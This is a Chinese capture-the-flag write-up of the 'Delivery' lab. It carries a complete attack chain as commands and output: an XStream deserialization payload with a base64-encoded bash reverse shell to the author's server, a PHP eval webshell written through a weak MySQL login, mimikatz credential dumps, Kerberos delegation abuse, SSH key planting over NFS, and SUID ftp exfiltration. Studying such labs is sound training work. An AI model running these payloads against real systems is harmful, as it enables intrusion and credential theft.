春秋云境·Delivery

考点:

  • xstream RCE
  • mysql弱口令+写马
  • ACL Admins写RBCD
  • linux写公钥连接
  • NFS利用
  • ftp提权

主页没东西,扫一下

./fscan -h 39.99.135.35
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 39.99.135.35    is alive
[*] Icmp alive hosts len is: 1
39.99.135.35:80 open
39.99.135.35:8080 open
39.99.135.35:21 open
39.99.135.35:22 open
[*] alive ports len is: 4
start vulscan
[*] WebTitle: http://39.99.135.35       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[+] ftp://39.99.135.35:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://39.99.135.35:8080  code:200 len:3655   title:公司发货单

看到有个ftp服务,能匿名登上去,连一下

1.txt里没东西,pom.xml:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>
    <parent>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-parent</artifactId>
        <version>2.7.2</version>
        <relativePath/> <!-- lookup parent from repository -->
    </parent>
    <groupId>com.example</groupId>
    <artifactId>ezjava</artifactId>
    <version>0.0.1-SNAPSHOT</version>
    <name>ezjava</name>
    <description>ezjava</description>
    <properties>
        <java.version>1.8</java.version>
    </properties>
    <dependencies>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-thymeleaf</artifactId>
        </dependency>
        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-web</artifactId>
        </dependency>

        <dependency>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-test</artifactId>
            <scope>test</scope>
        </dependency>

        <dependency>
            <groupId>com.thoughtworks.xstream</groupId>
            <artifactId>xstream</artifactId>
            <version>1.4.16</version>
        </dependency>

        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>

    <build>
        <plugins>
            <plugin>
                <groupId>org.springframework.boot</groupId>
                <artifactId>spring-boot-maven-plugin</artifactId>
            </plugin>
        </plugins>
    </build>

</project>

看到配置直接找到xstream的洞了,照着打即可

https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md

在你的vps上开放1099端口,然后用yso起一下服务:

java -cp ysoserial-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzUueHgueHgueHgvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}"

接着监听一下弹shell的端口,然后向网站传poc

POST /just_sumbit_it HTTP/1.1
Host: 39.99.135.35:8080
Content-Length: 3119
Accept: application/xml, text/xml, */*; q=0.01
DNT: 1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Content-Type: application/xml;charset=UTF-8
Origin: http://39.99.135.35:8080
Referer: http://39.99.135.35:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,vi;q=0.7
Content-Type: application/xml
Connection: close


<java.util.PriorityQueue serialization='custom'>
    <unserializable-parents/>
    <java.util.PriorityQueue>
        <default>
            <size>2</size>
        </default>
        <int>3</int>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.org.apache.xpath.internal.objects.XString'>
                <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
        <javax.naming.ldap.Rdn_-RdnEntry>
            <type>12345</type>
            <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
                <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
                    <parsedMessage>true</parsedMessage>
                    <soapVersion>SOAP_11</soapVersion>
                    <bodyParts/>
                    <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
                        <attachmentsInitialized>false</attachmentsInitialized>
                        <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                            <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                                    <names>
                                        <string>aa</string>
                                        <string>aa</string>
                                    </names>
                                    <ctx>
                                        <environment/>
                                        <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                                            <java.rmi.server.RemoteObject>
                                                <string>UnicastRef</string>
                                                <string>VPS_IP</string>
                                                <int>1099</int>
                                                <long>0</long>
                                                <int>0</int>
                                                <long>0</long>
                                                <short>0</short>
                                                <boolean>false</boolean>
                                            </java.rmi.server.RemoteObject>
                                        </registry>
                                        <host>VPS_IP</host>
                                        <port>1099</port>
                                    </ctx>
                                </candidates>
                            </aliases>
                        </nullIter>
                    </sm>
                </message>
            </value>
        </javax.naming.ldap.Rdn_-RdnEntry>
    </java.util.PriorityQueue>
</java.util.PriorityQueue>

然后wget一下fscan和Stowaway,打内网老两样了

start infoscan
(icmp) Target 172.22.13.14    is alive
(icmp) Target 172.22.13.6     is alive
(icmp) Target 172.22.13.28    is alive
(icmp) Target 172.22.13.57    is alive
[*] Icmp alive hosts len is: 4
172.22.13.28:80 open
172.22.13.57:80 open
172.22.13.57:22 open
172.22.13.14:80 open
172.22.13.14:22 open
172.22.13.14:21 open
172.22.13.6:445 open
172.22.13.6:139 open
172.22.13.28:445 open
172.22.13.28:139 open
172.22.13.6:135 open
172.22.13.28:135 open
172.22.13.14:8080 open
172.22.13.28:8000 open
172.22.13.28:3306 open
172.22.13.6:88 open
[*] alive ports len is: 16
start vulscan
[*] NetInfo:
[*]172.22.13.28
   [->]WIN-HAUWOLAO
   [->]172.22.13.28
[*] NetInfo:
[*]172.22.13.6
   [->]WIN-DC
   [->]172.22.13.6
[*] WebTitle: http://172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works
[*] NetBios: 172.22.13.6     [+]DC XIAORANG\WIN-DC          
[*] WebTitle: http://172.22.13.28       code:200 len:2525   title:欢迎登录OA办公平台
[*] NetBios: 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393 
[*] WebTitle: http://172.22.13.57       code:200 len:4833   title:Welcome to CentOS
[*] WebTitle: http://172.22.13.28:8000  code:200 len:170    title:Nothing Here.
[+] ftp://172.22.13.14:21:anonymous 
   [->]1.txt
   [->]pom.xml
[*] WebTitle: http://172.22.13.14:8080  code:200 len:3655   title:公司发货单
[+] mysql:172.22.13.28:3306:root 123456

这里172.22.13.28是个mysql弱口令,起一下全局代理用navicat连上去

看了一下secure_file_priv,发现是空的,所以能写文件上去

show variables like "secure_file_priv";

查看日志发现是phpstudy起的服务,那就很好,因为这东西权限很高,一般连上去就是system权限,不用udf提权了

show variables like "%general%"
select "<?php eval($_POST[1]);?>" into outfile "C:/phpstudy_pro/WWW/1.php";

连一下

然后老地方拿到flag

然后建个用户rdp上去

net user fushuling qwer1234! /add
net localgroup administrators fushuling /add

用BloodHound发现zhangwen这个用户是ACL Admins组的,对WIN-DC具有WriteDacl权限,能写属性,比如写个DCSync、RBCD啥的。不过首先先抓一下密码,把这个用户密码抓出来

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > test.txt
Authentication Id : 0 ; 219475 (00000000:00035953)
Session           : Service from 0
User Name         : chenglei
Domain            : XIAORANG
Logon Server      : WIN-DC
Logon Time        : 2023/10/4 16:46:14
SID               : S-1-5-21-3269458654-3569381900-10559451-1105
	msv :	
	 [00000003] Primary
	 * Username : chenglei
	 * Domain   : XIAORANG
	 * NTLM     : 0c00801c30594a1b8eaa889d237c5382
	 * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7
	 * DPAPI    : 89b179dc738db098372c365602b7b0f4
	tspkg :	
	wdigest :	
	 * Username : chenglei
	 * Domain   : XIAORANG
	 * Password : (null)
	kerberos :	
	 * Username : chenglei
	 * Domain   : XIAORANG.LAB
	 * Password : Xt61f3LBhg1
	ssp :	
	credman :	

然后用RBCD打一下就行了,我这里当时没截图,只能用history看一下当时的命令了

proxychains python3 addcomputer.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -dc-host xiaorang.lab -computer-name 'TEST$' -computer-pass 'P@ssw0rd'
proxychains python3 rbcd.py xiaorang.lab/chenglei:'Xt61f3LBhg1' -dc-ip 172.22.13.6 -action write -delegate-to 'WIN-DC$' -delegate-from 'TEST$'
proxychains python3 getST.py xiaorang.lab/'TEST$':'P@ssw0rd' -spn cifs/WIN-DC.xiaorang.lab -impersonate Administrator -dc-ip 172.22.13.6
export KRB5CCNAME=Administrator@cifs_WIN-DC.xiaorang.lab@XIAORANG.LAB.ccache

然后改/etc/hosts把dc加进去,即可无密码连上去

proxychains python3 psexec.py Administrator@WIN-DC.xiaorang.lab -k -no-pass -dc-ip 172.22.13.6

然后我当时傻逼了,想着还剩一个flag没打那就抓一下哈希横向过去,但最后一个flag在的地方是那个centos机器里,不在域内,不过这里也给一下当时的命令

proxychains python3 secretsdump.py -k -no-pass WIN-DC.xiaorang.lab -dc-ip 172.22.60.8

虽然抓到了哈希但没卵用

Administrator:500:aad3b435b51404eeaad3b435b51404ee:6341235defdaed66fb7b682665752c9a:

回到这个linux服务器,因为我们之前是弹shell打的,命令执行很麻烦而且没法持久化利用,所以我给root目录下写了ssh-keygen公钥然后就可以用私钥连上去了。

先在本地机子创建rsa密钥

ssh-keygen -t rsa -b 4096

可以看到我生成的公私钥创建在了/home/fushuling/.ssh/目录下,/home/fushuling/.ssh/id_rsa.pub的内容就是我们要写入的公钥

在弹的shell上执行:

cd /root
mkdir .ssh

然后把公钥传进去

echo "公钥内容" >>/root/.ssh/authorized_keys

接下来回到我们本地的机子上,就能用私钥连接上去了

当然,我们也可以把id_rsa的内容保存出来用xshell连上去,我后面就这么打的

题目说有一个NFS服务,也就是那个centos,首先更新一下连上去的那台机子上的依赖,不然没有相应的命令

sudo sed -i 's/archive.ubuntu.com/mirrors.aliyun.com/g' /etc/apt/sources.list
sudo apt-get update
apt-get install nfs-common -y

接下来在根目录挂载一下服务

cd /
mkdir temp
mount -t nfs 172.22.13.57:/ ./temp -o nolock

挂载了之后只能访问home目录,我们再次写公钥,就能连上centos机器了

ssh-keygen -t rsa -b 4096
cd /temp/home/joyce/
mkdir .ssh
cat /root/.ssh/id_rsa.pub >> /temp/home/joyce/.ssh/authorized_keys
python3 -c 'import pty;pty.spawn("/bin/bash")'
ssh  -i /root/.ssh/id_rsa joyce@172.22.13.57

上去之后根目录有一个flag但没权限读,有一个用户账户但没什么卵用,看一下怎么提权

find / -user root -perm -4000 -exec ls -ldb {} \;

一眼ftp,这个能suid所以我们能把flag传到ftp里。最初我们获得的机器里那个ftp服务没权限传,我们再起个

python3 -m pyftpdlib -p 6666 -u test -P test -w &

然后连上去(注意是内网ip)

ftp 172.22.13.14 6666
put /flag02.txt

然后我们在外面连一下就能找到传上来的flag了

看了一下x1r0z的wp,NFS这里似乎能直接提权:nfs提权,不过我都用suid了,这里就略过了

暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇